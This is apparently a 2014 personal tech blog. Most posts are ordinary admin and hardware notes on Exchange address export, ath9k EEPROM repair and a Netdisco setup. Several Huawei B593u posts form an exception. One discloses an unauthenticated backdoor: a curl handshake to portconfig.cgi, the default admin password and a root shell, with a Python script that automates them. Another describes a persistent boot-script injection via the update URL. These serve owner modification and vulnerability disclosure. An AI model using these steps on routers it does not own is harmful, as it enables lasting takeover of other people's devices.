Monday, September 01, 2014

Export all SMTP addresses from Exchange using PowerShell

Tested with Exchange 2010. You need the Exchange Management Shell, but not Exchange admin rights, since Get-Recipient only reads recipient objects.

Get-Recipient -ResultSize unlimited | Select Name -ExpandProperty EmailAddresses | Where-Object {$_.SmtpAddress -ne $null} | Select Name,SmtpAddress,IsPrimaryAddress | Export-csv -Encoding unicode -NoTypeInformation AllEmailAddress.csv

Sunday, August 31, 2014

How to change Atheros AR9xxx aka ath9k EEPROM values

One of my Atheros AR9280 mini-PCIe cards had an odd, undefined regulatory domain (0x6B) configured in its EEPROM. This broke even the latest Linux ath9k driver, so I wanted to change it to a valid regdomain. The ath9k developers consider that a sin and try to prevent it, but luckily our old friend iwleeprom has Atheros support, which lets us fix it.

# The usual preparations
apt-get update
apt-get -y install git subversion build-essential

# Download atheros branch of iwleeprom and compile it
mkdir -p /opt/iwleeprom
cd /opt/iwleeprom
svn checkout http://iwleeprom.googlecode.com/svn/branches/atheros/ atheros
cd atheros
make

# Shutdown wifi
ifdown wlan0

# Find PCI ID of your device using lspci
lspci

# Mine was 03:00.0
# 03:00.0 Network controller: Qualcomm Atheros AR928X Wireless Network Adapter (PCI-Express) (rev 01)

# Init card
./iwleeprom -d 0000:03:00.0 -I

# Verify that card is properly identified
./iwleeprom -d 0000:03:00.0 -s

# Backup current eeprom content
./iwleeprom -d 0000:03:00.0 -o original.bin

# Patch the regulatory domain from non-standard 0x6B to WOR5_ETSIC (0x65).
# regDmn[0] is at byte 520 (0x208) of the dump: the base header starts at 0x200
# and regDmn[0] is its fifth 16-bit word (after length, checksum, version and opCapFlags/eepMisc).
cp original.bin etsic0x65.bin
echo -ne '\x65' | dd of=etsic0x65.bin bs=1 seek=520 conv=notrunc

# Program patched eeprom back to device
echo Y|./iwleeprom -d 0000:03:00.0 -i etsic0x65.bin

# Verify that regdom was changed.
# Take note of the last CRC line, as this is the new CRC we need,
# for example "CRC (eval)  : fb27"
./iwleeprom -d 0000:03:00.0 -s

# Patch the eeprom to carry the correct CRC (byte 514 = checksum word of the base header).
# The 16-bit value is stored little-endian, so the bytes are written in reverse order.
cp etsic0x65.bin etsic0x65crc.bin
echo -ne '\x27\xfb' | dd of=etsic0x65crc.bin bs=1 seek=514 conv=notrunc

# Program crc patched eeprom back to device
echo Y|./iwleeprom -d 0000:03:00.0 -i etsic0x65crc.bin

# Verify that crc matches now
./iwleeprom -d 0000:03:00.0 -s

# Export changed eeprom content
./iwleeprom -d 0000:03:00.0 -o new.bin

# Ensure what we wrote and read match
md5sum etsic0x65crc.bin new.bin

# Reload ath9k.ko
rmmod ath9k
modprobe ath9k

# Turn wifi back on
ifup wlan0

# Check dmesg for more details
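The regdomain and checksum patching done above with dd, as an added Python example (not part of the original post or of iwleeprom). It assumes the ath9k "def" EEPROM layout that the post's byte offsets imply: the AR5416 magic 0xA55A at byte 0 of the dump, the base header at byte 0x200 with length, checksum, version, opCapFlags/eepMisc and regDmn[0] as its first five 16-bit little-endian words, and ath9k's acceptance rule that XOR-ing every word of the header region (checksum word included) must give 0xFFFF. The sample image is constructed, not a real dump; point it at your own original.bin for real use.

```python
import struct

# Added example, not from the original post or from iwleeprom.
# Assumed layout (ath9k eeprom_def, consistent with the dd offsets 520/514 above):
#   byte 0x000: AR5416 EEPROM magic 0xA55A
#   byte 0x200: base header, 16-bit little-endian words:
#               length(bytes) | checksum | version | opCapFlags,eepMisc | regDmn[0] | ...
# ath9k accepts the image only if the XOR of all words covered by 'length'
# (checksum word included) equals 0xFFFF.

EEP_MAGIC = 0xA55A
EEP_BASE = 0x200
OFF_LENGTH, OFF_CHECKSUM, OFF_REGDMN0 = 0, 2, 8


def header_words(img, base=EEP_BASE):
    """16-bit LE words of the header region, as far as the image actually holds them."""
    length = struct.unpack_from("<H", img, base + OFF_LENGTH)[0]
    nwords = min(length, len(img) - base) // 2
    return struct.unpack_from("<%dH" % nwords, img, base)


def xor_words(words):
    x = 0
    for w in words:
        x ^= w
    return x


def checksum_ok(img, base=EEP_BASE):
    return xor_words(header_words(img, base)) == 0xFFFF


def read_regdomain(img, base=EEP_BASE):
    return struct.unpack_from("<H", img, base + OFF_REGDMN0)[0]


def patch_regdomain(img, regdomain, base=EEP_BASE):
    """Return a copy with regDmn[0] replaced and the checksum recomputed so the
    XOR rule holds; this is the two dd writes plus the iwleeprom CRC readout in one step."""
    if struct.unpack_from("<H", img, 0)[0] != EEP_MAGIC:
        raise ValueError("no AR5416 EEPROM magic at byte 0; wrong dump or wrong offset")
    out = bytearray(img)
    struct.pack_into("<H", out, base + OFF_REGDMN0, regdomain)
    struct.pack_into("<H", out, base + OFF_CHECKSUM, 0)   # keep the old checksum out of the XOR
    struct.pack_into("<H", out, base + OFF_CHECKSUM, xor_words(header_words(out, base)) ^ 0xFFFF)
    return bytes(out)


def demo_image():
    """Constructed stand-in for an 'iwleeprom -o' dump: 0x240 bytes, bogus checksum, regDmn[0]=0x6B."""
    img = bytearray(0x240)
    struct.pack_into("<H", img, 0, EEP_MAGIC)
    struct.pack_into("<HHHBBH", img, EEP_BASE, 0x40, 0x0000, 0xE002, 0x03, 0x00, 0x006B)
    return bytes(img)


if __name__ == "__main__":
    original = demo_image()                 # for a real card: open("original.bin", "rb").read()
    patched = patch_regdomain(original, 0x65)   # WOR5_ETSIC
    print("regdomain 0x%02X -> 0x%02X" % (read_regdomain(original), read_regdomain(patched)))
    print("checksum word at byte 514, as stored (little-endian):", patched[514:516].hex())
    print("checksum valid:", checksum_ok(patched))
```

Write the returned bytes to a file and flash it with "iwleeprom -i" as in the steps above; the stored checksum bytes come out in the reversed order the post describes, so no manual byte swapping is needed.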

Saturday, August 30, 2014

Modifying Huawei B593u firmware images using FMK

Nothing special here in my opinion, but I've seen a few comments saying that FMK doesn't work with the Huawei B593u. Just follow the instructions below and you end up with a normal firmware image with one important difference: you can telnet in as admin from the LAN side of the device.

This is for the latest T-Mobile firmware, SP106, but adjust the firmware identifiers and it will work for others as well.

# Install some tools needed
sudo apt-get update
sudo apt-get -y install git build-essential zlib1g-dev liblzma-dev python-magic zip unzip

# Download and compile fmk
mkdir -p ~/fmk
cd ~/fmk
git clone https://code.google.com/p/firmware-mod-kit/
cd firmware-mod-kit/src
./configure
make

# Download and unpack B593u firmware
mkdir -p ~/fmk/106
cd ~/fmk/106
wget "http://hilfe.telekom.de/dlp/eki/downloads/Speedport/Speedport%20LTE%20II/Firmware_Speedport_LTE_II_B593u-12_V100R001C748SP106.zip"
unzip Firmware_Speedport_LTE_II_B593u-12_V100R001C748SP106.zip
tar xvf V100R001C748SP106.tar.bz2 

# Extract trx
~/fmk/firmware-mod-kit/extract-firmware.sh B593.trx 

# Make backup of file we're going to patch
cp -a fmk/rootfs/bin/cms fmk

# Allow inbound telnet from LAN: replace the rule that drops port 23 with one that accepts the LAN subnet.
# Make sure your replacement string is exactly the same length as the original! The binary is patched
# in place, and changing its size would shift every offset behind the string. The trailing "#" padding
# is a shell comment, which is why a space precedes it.
sed fmk/rootfs/bin/cms -i \
    -e's|iptables -A INPUT_SERVICE -p tcp  --dport 23 -j DROP 2>/dev/null|iptables -I INPUT -s 192.168.1.0/24 -j ACCEPT ##################|g'

# Check that the original and modified binaries are the same size but have different timestamps
ls -l fmk/cms fmk/rootfs/bin/cms

# Remove some unnecessary files to shrink squashfs image and keep fmk happy
rm -f fmk/rootfs/sbin/mkntfs

# Update the version string in the headers so that a device already running SP106 accepts our customized build
sed -i.bak fmk/image_parts/header.img \
    -e's|V100R001C748SP106\x00\x00\x00|V100R001C748SP106hax|g'

# Rebuild trx
~/fmk/firmware-mod-kit/build-firmware.sh

# Create new firmware archive
mv fmk/new-firmware.bin B593.trx
chmod 0644 B593.trx modem.bin help.tar.bz2 B593-small.trx
tar --owner=LTECPE --group=LTECPE -cvjf V100R001C748SP106_TELNET.tar.bz2 B593.trx modem.bin help.tar.bz2 B593-small.trx

# Cleanup
sudo rm -rf fmk

Done. Upload V100R001C748SP106_TELNET.tar.bz2 to your router.

After the firmware upgrade, simply telnet from the LAN to 192.168.1.1. Usually the first attempt fails with "connection refused", but try again after a few seconds and it will work. Log in as "admin" with password "HW4GCPE". At the ATP prompt type "shell" to open a root shell.

Almost the same procedure works for the B593u-91, although as I don't have a u-91 the resulting firmware has not been tested.

mkdir -p ~/fmk/u91
cd ~/fmk/u91
wget https://www.dropbox.com/s/ij2npnp6klweaxa/u91_r%2Bm%2Bh%2Bs.tar.bz2
tar xvf u91_r+m+h+s.tar.bz2
~/fmk/firmware-mod-kit/extract-firmware.sh B593.trx 
cp -a fmk/rootfs/bin/cms fmk
sed fmk/rootfs/bin/cms -i \
    -e's|iptables -A INPUT_SERVICE -p tcp  --dport 23 -j DROP 2>/dev/null|iptables -I INPUT -s 192.168.1.0/24 -j ACCEPT ##################|g'
ls -l fmk/cms fmk/rootfs/bin/cms
rm -f fmk/rootfs/sbin/mkntfs
sed -i.bak fmk/image_parts/header.img \
    -e's|V100R001C00SP053\x00\x00\x00|V100R001C00SP053hax|g'
~/fmk/firmware-mod-kit/build-firmware.sh
mv fmk/new-firmware.bin B593.trx
chmod 0644 B593.trx product_info modem.bin help.tar.bz2 B593-small.trx
tar --owner=LTECPE --group=LTECPE -cvjf V100R001C00SP053_TELNET.tar.bz2 B593.trx modem.bin product_info help.tar.bz2 B593-small.trx
sudo rm -rf fmk


Thursday, August 28, 2014

Inside old Motorola (Symbol) AP-5131 access point

I found a couple of Motorola AP-5131 802.11a/g access points today. It's an old design from Symbol Technologies dating back to 2005, with a manufacturing date of 2010.

Those APs had a very decent design and hardware specs, especially for something that old. It runs MontaVista Linux with kernel 2.4.30 on an Intel XScale IXP425 at 266 MHz, with 64 MB RAM, 64 MB flash, 2 MB boot flash, two 100 Mbit/s Ethernet interfaces (Altima AC101L MII PHY), 802.3af PoE support and two mini-PCI slots. The WLAN card is a rare Intersil / Conexant GW3888.

The bootloader is something custom that Symbol built. With JTAG pins on the board, and what overall looks like an Intel reference design in a different shape, it should be fairly easy to run OpenWrt on this: figure out how the GPIOs are mapped, replace the bootloader with RedBoot and that's about it. The stock bootloader might be fine as well; I haven't really looked, as this is old and there are only two of them, so I'm not that interested myself, especially since there are no drivers for the WLAN card.

Top side

Bottom side

Intel Xscale IXP425 CPU

2 * 32MiB RAM

64MiB NAND flash for OS

2MiB NAND flash for bootloader

Intersil / Conexant GW3888 based WLAN

Intersil ISL3692 radio

Complete set of images here.

Win95 / NT4 / 2000 / XP drivers for the WLAN card are available from Microsoft. Some ancient FreeBSD drivers claim to support the ISL3888 (which is the same as the GW3888), but I have some doubts whether that's actually true. The Intersil / Conexant codename for the 3888 is "Isotope"; this was in the Motorola / Symbol AP-300 release notes, as apparently the AP-300 was upgraded from a regular Prism54 to "Isotope" at some point.


Saturday, August 23, 2014

Netdisco2 on Ubuntu 14.04

Netdisco is a neat tool that collects the layer-2 forwarding database from switches, matches MACs with the layer-3 ARP table from the router and presents it all over a searchable web UI.

The old "Netdisco 1" was quite horrible to set up, but it still did its job. Recently "Netdisco 2" was released, making the admin's life much easier and also bringing a fancy new look to the web UI.

So here are my notes on installing a new virtual machine with Netdisco 2.


# Install Ubuntu 14.04.1 LTS Server x64 with defaults

# After install login and switch to root
sudo su -

# Update system
apt-get update
apt-get -y dist-upgrade

# Add some basic tools we like
apt-get -y install openssh-server open-vm-tools build-essential joe wget screen lftp mtr-tiny zip ntp

# Get rid of some spyware
apt-get -y remove popularity-contest

# Disable IPv6 support on next reboot
echo "net.ipv6.conf.all.disable_ipv6=1" >>/etc/sysctl.conf


# Install a caching DNS server to reduce and speed up the DNS queries Netdisco sends while operating
apt-get -y install dnsmasq

# Generate config file for dnsmasq
cat <<'__EOF__' >/etc/dnsmasq.d/custom.conf
neg-ttl=180
max-ttl=600
all-servers
domain-needed
bogus-priv
filterwin2k
server=8.8.8.8
server=8.8.4.4
server=208.67.222.222
server=208.67.220.220
interface=lo
__EOF__

# Remove the resolvconf package, which would otherwise rewrite resolv.conf
apt-get -y remove resolvconf

# Fix DNS resolver settings to use local DNS first with Google and OpenDNS as fallback
# Normally I wouldn't use OpenDNS but I'm giving them new chance now that they stopped
# hijacking NXDOMAIN queries.
cat <<'__EOF__' >/etc/resolv.conf
search mpoli.fi
options timeout:5
nameserver 127.0.0.1
nameserver 8.8.8.8
nameserver 208.67.222.222
__EOF__

# Don't mess with resolv.conf via /etc/network either
sed -i.bak -e's|dns-|#dns-|g' /etc/network/interfaces

# Restart dnsmasq so our changes are activated
service dnsmasq restart


# Install Netdisco deps
# (curl is needed for the cpanm bootstrap below and is not installed by default on Ubuntu Server)
apt-get -y install libdbd-pg-perl libsnmp-perl postgresql pgtune fping curl

# PostgreSQL configuration for better performance, defaults are good for Pentium Pro at 200MHz
mv /etc/postgresql/9.3/main/postgresql.conf /etc/postgresql/9.3/main/postgresql.conf.old
pgtune -i /etc/postgresql/9.3/main/postgresql.conf.old -o /etc/postgresql/9.3/main/postgresql.conf

# Switch to postgres user and create new SQL user
su - postgres
createuser -DRSP netdisco
# Enter some password here
createdb -O netdisco netdisco

# Switch back to root
exit


# Netdisco install based on instructions from
# https://metacpan.org/pod/App::Netdisco#Installation

# Add new user account for Netdisco
adduser netdisco --shell /bin/bash --disabled-password --gecos netdisco

# Switch to netdisco user and install required perl components under user homedir
su - netdisco
curl -L http://cpanmin.us/ | perl - --notest --local-lib ~/perl5 App::Netdisco

# Create some links
mkdir ~/bin
ln -s ~/perl5/bin/{localenv,netdisco-*} ~/bin/

# Test install
~/bin/netdisco-daemon status

# Create the config file with your PostgreSQL username and password, default SNMP communities etc.
# See the examples in ~/perl5/lib/perl5/auto/share/dist/App-Netdisco/environments/deployment.yml
mkdir -p ~/environments
cat <<'__EOF__' >~/environments/deployment.yml
database:
  name: 'netdisco'
  user: 'netdisco'
  pass: 'S3cretForYouAndMe'
safe_password_store: true
snmp_auth:
  - tag: 'default_1'
    community: 'notsopublic'
    read: true
    write: false
  - tag: 'default_2'
    community: 'public'
    read: true
    write: false
schedule:
  discoverall:
     when: '5 1,7,13,19 * * *'
  macwalk:
     when: '35 1,7,13,19 * * *'
  arpwalk:
     when: '45 1,7,13,19 * * *'
  nbtwalk:
     when: '55 1,7,13,19 * * *'
  expire:
     when: '15 23 * * *'
dns:
  max_outstanding: 50
workers:
  tasks: 'AUTO * 5'
__EOF__

# Build initial database
# You will be asked for webui admin credentials etc.
~/bin/netdisco-deploy

# Create script to start Netdisco
cat <<'__EOF__' >~/run-netdisco.sh
#!/bin/bash
~/bin/netdisco-web start
sleep 5
~/bin/netdisco-daemon start
__EOF__
chmod a+x ~/run-netdisco.sh

# Launch it
~/run-netdisco.sh

# Verify functionality with browser by opening http://netdisco.foo.bar:5000/
# Login using admin account just created
# Enter IP of switch or router to add and click discover
# If you have proper SNMP communities and LLDP/CDP settings in place it should discover entire site straight away

# Return to root shell
exit

# Autostart netdisco after reboot
# Write a complete rc.local (the stock one only contains "exit 0") and keep it executable.
# rc.local already runs as root, so no sudo is needed.
cat <<'__EOF__' >/etc/rc.local
#!/bin/sh -e
( su - netdisco -c '/home/netdisco/run-netdisco.sh' ) &
exit 0
__EOF__
chmod 0755 /etc/rc.local


# Following steps are needed only if you don't have SNMP read access to upstream router
# but have Linux server in subnet you want to monitor.

# Enable local SNMP server
apt-get -y install snmpd
mv /etc/snmp/snmpd.conf /etc/snmp/snmpd.conf.old
cat <<'__EOF__'>/etc/snmp/snmpd.conf
rocommunity notsopublic
sysservices 79
agentaddress 127.0.0.1
# only listens on lo interface assuming this is same host that Netdisco is running
__EOF__

# Restart snmp
service snmpd restart

# Because we don't have SNMP read rights to ISP router we must keep local ARP table populated manually
fping -g 11.22.0.0/23   -b 24 -c 1 -B 1 -p 25 -q -r 1 -t 100

# Discover 127.0.0.1 via Netdisco webui next

# Schedule fping to run slightly before arpnip/arpwalk (45 past the hour in deployment.yml above).
# Unlike a user crontab, /etc/crontab entries need a user field.
cat <<'__EOF__' >>/etc/crontab
44 1,7,13,19 * * * root fping -g 11.22.0.0/23   -b 24 -c 1 -B 1 -p 25 -q -r 1 -t 100 >/dev/null 2>/dev/null
__EOF__

# Restart cron
service cron restart


# Now would be good time to restart server so all changes are applied and to make sure Netdisco 
# will come up after boot.
reboot


# Later to install netdisco updates
# (Take backup first.. of course)

# Switch to netdisco user
sudo su - netdisco

# upgrade Netdisco
~/bin/localenv cpanm --notest App::Netdisco

# apply database schema updates
~/bin/netdisco-deploy

# restart web service
~/bin/netdisco-web restart

# restart job daemon
~/bin/netdisco-daemon restart

Tuesday, August 19, 2014

Huapwn - Backdoor on your Huawei B593u

The public Huawei document I linked a couple of days ago mentioned a factory diagnostics tool called "Huawei deviceLocker V0.1" that grants access to a root shell on the router. I got curious about how this would actually work and came to the conclusion that it must be something extremely simple and insecure; it IS Huawei after all. After some poking around in the /bin/web process I figured it out: it's all there in clear text for anyone to read. And the admin password is in Huawei docs, so not exactly secret either. In case you didn't realize: no authentication is needed to exploit this. Protip: try to hide your backdoors a bit better next time.

# Send magic packet that enables telnet, timeout error is expected
curl -m5 \
-d "switch=0&handshakeFlag=zzfdfwetljioi34004t50jodjgkjgjiyte894uifdug89h98y3hjhgjdgjuihjqq" \
http://192.168.1.1/portconfig.cgi

telnet 192.168.1.1
# if telnet says "connection refused", keep trying every few seconds; it will work
# if telnet just hangs and times out, the port is not open and there's no point retrying with telnet
# login: admin
# pass: HW4GCPE
# type "shell" or "sh" to open a root shell
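The curl and telnet steps above as an added Python example (not part of the original post): it POSTs the handshake and then polls port 23 exactly the way the comments describe, retrying on "connection refused" (telnetd still starting) and giving up immediately on a timeout (port filtered, trigger did nothing). The handshake string and URL are the ones from the post; the host, timeouts and retry counts are assumptions.

```python
import socket
import time
import urllib.error
import urllib.parse
import urllib.request

# Added example, not from the original post. Wraps the curl + telnet steps above.
# Host, timeouts and attempt counts are assumptions; the handshake is the one in the post.

HANDSHAKE = "zzfdfwetljioi34004t50jodjgkjgjiyte894uifdug89h98y3hjhgjdgjuihjqq"


def send_trigger(host="192.168.1.1", timeout=5.0):
    """POST the magic handshake to portconfig.cgi. The router does not answer,
    so a timeout is the normal outcome and is swallowed here (curl -m5 does the same)."""
    body = urllib.parse.urlencode({"switch": "0", "handshakeFlag": HANDSHAKE}).encode()
    try:
        urllib.request.urlopen("http://%s/portconfig.cgi" % host, data=body, timeout=timeout)
    except (urllib.error.URLError, socket.timeout, OSError):
        pass


def probe(host, port, timeout=2.0):
    """One TCP connect attempt: 'open', 'refused' (RST came back), 'timeout'
    (filtered or no listener reachable) or 'unreachable' (any other socket error)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "refused"
    except socket.timeout:
        return "timeout"
    except OSError:
        return "unreachable"
    finally:
        s.close()


def wait_for_telnet(host, port=23, attempts=10, delay=3.0, probe_fn=probe, sleep_fn=time.sleep):
    """'refused' means telnetd is still coming up: wait and retry.
    'timeout' means the port is filtered, i.e. the trigger did nothing: stop at once.
    Returns (final_state, number_of_probes_made)."""
    for n in range(1, attempts + 1):
        state = probe_fn(host, port)
        if state == "open":
            return "open", n
        if state == "timeout":
            return "timeout", n
        sleep_fn(delay)
    return "gave-up", attempts


if __name__ == "__main__":
    send_trigger()
    print(wait_for_telnet("192.168.1.1"))
```

The probe function is injectable so the retry logic can be exercised without a router on the bench; with the real probe, "open" means you can now telnet in with the credentials listed above.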

To be fair, Huawei is at least trying, since this backdoor HAS been closed recently. Not that I could find any public disclosure about exactly this hole. The B593u is a rather common device (at least in Europe) and most operators still only distribute old firmware versions where this hole is present.

Polkomtel SP103 and T-Mobile SP102/SP104/SP105 (the latest known firmwares for the B593u-12) have a slightly different /bin/web binary than the older builds. The newer versions still have the same backdoor function present, using the same "handshake", but portconfig.cgi is no longer in the list of accepted URLs. It's not an actual CGI; /bin/web simply has a list of URLs and the internal functions to trigger for each of them. This list has been edited either to remove this backdoor or, worse, to hide it while still allowing it to be triggered some other way.

So unless you're willing to take the risk of flashing unsupported firmware customized for another operator, your router is just waiting to be hacked. Hacked permanently, that is.

Combined with the persistent hack I posted a few hours ago, malicious hackers could seriously own the device, and not even a factory reset paired with a full firmware upgrade would help you. Or have you seen many anti-rootkit tools for routers lately?


Persistent customizations to Huawei B593u with stock firmware

Perhaps you're fairly satisfied with the Huawei stock firmware but would like to fix some security problems and remove the spyware installed at the factory. There's a fairly easy way to do this.

You need root-level shell access to the device via one of the many vulnerabilities present; this one is easy. Compiling new binaries with the stock Broadcom toolchain is easy as well. The problem is how to make them persistent, so that the customizations are loaded when the device reboots.

The answer is actually quite simple. Create a script under /upgflash, which is the 256 MB USB flash device embedded inside the router. Let's be creative and call this script "rc.local". Put the following two lines in it:

#!/bin/sh
/bin/iptables -I INPUT -s 192.168.1.0/24 -j ACCEPT

Make the script executable. After each reboot this grants you telnet access to the device from the internal subnet (assuming the default IP range).

Export the current configuration from flash to /tmp/flashinfo.bin:
flashtest export e00000 262144

Load the file in a hex editor and search for "HttpUpg UpdateURL". Depending on your location it will be something like "update-westerneurope.huaweidevice.com". Replace this with ";/upgflash/rc.local;.huaweidevice.com". Make sure to keep the string length intact so you don't have to update the content-length information at the beginning of flashinfo.bin. DO NOT MAKE THE FILE BIGGER THAN 262144 BYTES, OTHERWISE YOU'LL END UP OVERWRITING THE FACTORY DEFAULT CONFIG -> DEAD DEVICE THE NEXT TIME YOU DO A FACTORY RESET.

Write the modified configuration back to the device:
flashtest load flashinfo.bin e00000

Reboot with -f to make sure our config stays in place:
reboot -f

What this does is trick the system into executing the /upgflash/rc.local script on every reboot instead of sending your device and SIM information to Huawei.

You can safely use around 100 MB of /upgflash without risking breakage during firmware upgrades. This modification also persists across firmware upgrades, although I highly recommend doing a factory reset, then the upgrade, and only then adding the hacks back; for example, you don't want to interfere with the modem firmware upgrade process and end up bricking it.

What to do with this hack? As said, compile binaries with the Broadcom toolchain and use them. Perhaps even a chrooted mipsel Debian on a USB stick, so you aren't limited to the Huawei world.

Unlike major modifications such as replacing the stock firmware with OpenWrt, this lets you keep the stock features while also making it possible to add new customizations.
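Both the /bin/cms patch in the FMK post above (sed with a "#"-padded replacement) and the flashinfo.bin URL swap here (hex editor, same-length string, hard 262144-byte limit) are the same technique: replace a string inside a binary without changing its size, so no offset or length field moves. Here it is as an added Python example, not part of the original post or of Huawei's tooling; the ELF-ish and flashinfo sample blobs are constructed, and the rule strings, URL and script path are the ones the post uses.

```python
# Added example, not from the original post. Same-length in-place string patching,
# as used above for /bin/cms in the FMK post (sed) and here for the update URL in
# flashinfo.bin (hex editor). The sample blobs are constructed, not real firmware.

MAX_FLASHINFO = 262144   # limit from the post: a larger file overwrites the factory config

OLD_RULE = b"iptables -A INPUT_SERVICE -p tcp  --dport 23 -j DROP 2>/dev/null"
NEW_RULE = b"iptables -I INPUT -s 192.168.1.0/24 -j ACCEPT"


def pad_to(new, length, pad=b"#", sep=b" "):
    """Pad `new` to exactly `length` bytes. For shell strings a '#' comment only
    starts at a word boundary, so a separator goes before the padding; use
    sep=b'' with pad=b'\\x00' for NUL-padded fields such as the header version string."""
    short = length - len(new)
    if short < 0:
        raise ValueError("replacement is %d bytes longer than the original" % -short)
    if short == 0:
        return new
    if short < len(sep):
        raise ValueError("no room for the separator")
    return new + sep + pad * (short - len(sep))


def patch_same_length(blob, old, new, pad=b"#", sep=b" "):
    """Replace the single occurrence of `old` with `new` (padded) without changing
    the blob size. Refuses if `old` is absent or ambiguous."""
    new = pad_to(new, len(old), pad, sep)
    n = blob.count(old)
    if n != 1:
        raise ValueError("expected exactly one occurrence of %r, found %d" % (old, n))
    out = blob.replace(old, new)
    assert len(out) == len(blob)
    return out


def patch_flashinfo(blob, old_url, script=b"/upgflash/rc.local"):
    """Turn the HttpUpg UpdateURL value into ';<script>;' plus the tail of the old
    URL so the length is unchanged (e.g. ';/upgflash/rc.local;.huaweidevice.com'),
    and enforce the 262144-byte limit before touching anything."""
    if len(blob) > MAX_FLASHINFO:
        raise ValueError("flashinfo is %d bytes, refusing to exceed %d" % (len(blob), MAX_FLASHINFO))
    prefix = b";" + script + b";"
    if len(prefix) > len(old_url):
        raise ValueError("script path too long for this URL")
    new_url = prefix + old_url[len(prefix):]
    return patch_same_length(blob, old_url, new_url, sep=b"")


if __name__ == "__main__":
    cms = b"\x7fELF\x00" + OLD_RULE + b"\x00/bin/sh\x00"                        # constructed
    print(patch_same_length(cms, OLD_RULE, NEW_RULE))
    flash = b"HttpUpg UpdateURL=update-westerneurope.huaweidevice.com\x00" + b"\x00" * 64  # constructed
    print(patch_flashinfo(flash, b"update-westerneurope.huaweidevice.com"))
```

For the real files, read fmk/rootfs/bin/cms or /tmp/flashinfo.bin into `blob`, write the returned bytes back to the same path, and compare sizes before and after as the FMK post does with ls -l.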

----------

It's possible to compile working binaries with toolchain from Asus router using same chipset. Below works for Ubuntu 14.04 x64.



apt-get install lib32z1 lib32ncurses5 lib32bz2-1.0 unzip
mkdir -p /opt/asus
cd /opt/asus
unzip GPL_RT_N53_30043744561.zip
cd GPL_RT_N53_30043744561
tar xvf GPL_RT-N53_3.0.0.4.374.4561-g5f5c8d8.tgz 
mv asuswrt /opt/
ln -s /opt/asuswrt/tools/brcm /opt/brcm

When compiling:

export PATH=$PATH:/opt/brcm/hndtools-mipsel-linux/bin:/opt/brcm/hndtools-mipsel-uclibc/bin
./configure --build=x86_64-linux-gnu --host=mipsel-linux-uclibc

----------

Saturday, August 16, 2014

Unpacking Huawei B593u compressed Broadcom CFE bootloader

Sorry, one more B593u post, but I felt this is worth documenting.

While hacking my way into the Huawei B593u I had a big problem with Huawei's crippled CFE bootloader. It was not talking to me, and when I finally did get it to talk it was only one way: all I could see was a CFE> prompt after smashing ^C, but nothing else.

I had already dumped the CFE from flash by then, so I obviously went to check it out, but there was not much to see. So I ran binwalk, which told me the CFE contained LZMA compressed data. Ah-ha! The initial bootloader decompresses an LZMA part that contains all the juicy bits.

Yet I couldn't unpack this LZMA blob. It was not a total misidentification by binwalk either; it was clearly compressed data. Maybe it's not LZMA? After some failed attempts I remembered a similar problem with Realtek squashfs a couple of years ago. Back then the problem was newer LZMA decompressors being incompatible with the outdated versions all these WiFi SoC vendors love to use.

I was able to extract the Huawei compressed CFE using a binary named "lzma_4k", which is part of the Asus RT-N56U GPL release. I don't have the sources for this, so you'll need a Linux system capable of running i386 binaries. Compiling an old enough LZMA SDK might be enough (lzma_4k identifies itself as "LZMA Utility 4.63 : Igor Pavlov : Public domain : 2008-12-31"), but I have no idea how many Broadcom patches it contains.

# Find offset of compressed CFE
binwalk 0x000000-0x040000.bootloader 

38132           0x94F4          LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 219824 bytes

# Skip beginning
dd if=0x000000-0x040000.bootloader bs=38132 skip=1 of=boot.lzma

# Get compatible lzma binary
wget --no-check-certificate "https://github.com/rrelmy/asus-rt-n56u-firmware/blob/master/src/ctools/lzma_4k?raw=true"

# Unpack
lzma_4k d boot.lzma boot

A quick "strings" on the uncompressed bootloader reveals some interesting NVRAM parameters, namely "console_disable", which we simply set to 0, and like that the serial port comes alive with CFE 5.60.120.9.
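The carving step above, as an added Python example that is not part of the original post, binwalk or lzma_4k. It decodes the 13-byte LZMA_Alone header binwalk reported (properties byte for lc/lp/pb, 32-bit little-endian dictionary size, 64-bit little-endian uncompressed size), carves the stream at the dd offset, and tries the xz-based decoder in Python's standard library first; if liblzma rejects the stream, that is the vendor-SDK incompatibility the post describes and the point to fall back to lzma_4k. The sample blob is constructed; the header values in the demo are the ones binwalk printed for the B593u CFE.

```python
import lzma
import struct

# Added example, not from the original post, binwalk or lzma_4k.
# LZMA_Alone (".lzma") header: props byte | u32 LE dictionary size | u64 LE uncompressed size
# (0xFFFFFFFFFFFFFFFF = unknown, stream then ends with an end marker).

HEADER_LEN = 13
SIZE_UNKNOWN = 0xFFFFFFFFFFFFFFFF


def parse_lzma_alone_header(buf, offset=0):
    props, dict_size, usize = struct.unpack_from("<BIQ", buf, offset)
    if props >= 9 * 5 * 5:
        raise ValueError("invalid LZMA properties byte 0x%02X" % props)
    lc, rest = props % 9, props // 9          # props = (pb * 5 + lp) * 9 + lc
    lp, pb = rest % 5, rest // 5
    return {"lc": lc, "lp": lp, "pb": pb, "dict_size": dict_size,
            "uncompressed_size": None if usize == SIZE_UNKNOWN else usize}


def carve_lzma(blob, offset):
    """Equivalent of 'dd bs=<offset> skip=1': header fields plus the stream from the header on."""
    return parse_lzma_alone_header(blob, offset), blob[offset:]


def try_decompress(stream):
    """Decode with liblzma. Returns (data, trailing_byte_count) on success, or None if
    liblzma rejects the stream or never reaches its end; None is the cue to fall back
    to the old lzma_4k binary the post uses."""
    d = lzma.LZMADecompressor(format=lzma.FORMAT_ALONE)
    try:
        data = d.decompress(stream)
    except lzma.LZMAError:
        return None
    if not d.eof:
        return None        # truncated: end marker or declared size never reached
    return data, len(d.unused_data)


if __name__ == "__main__":
    # Header as binwalk printed it for the B593u CFE: props 0x5D, 8 MiB dictionary, 219824 bytes out
    print(parse_lzma_alone_header(bytes([0x5D, 0x00, 0x00, 0x80, 0x00]) + struct.pack("<Q", 219824)))
```

For a real dump, pass the bootloader image and the binwalk offset (38132 above) to carve_lzma and hand the stream to try_decompress; a result of None with a sane-looking header is exactly the situation in which lzma_4k succeeded for the author.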


Latest modem.bin LTE dongle firmware for Huawei B593u-12

